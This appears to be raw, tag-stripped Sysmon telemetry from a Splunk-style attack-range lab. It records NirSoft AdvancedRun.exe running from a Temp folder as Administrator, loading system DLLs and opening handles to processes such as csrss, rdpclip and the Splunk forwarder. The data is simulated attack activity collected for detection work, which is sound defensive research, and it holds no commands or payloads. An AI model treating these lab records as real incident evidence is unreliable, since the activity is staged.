CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004015347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
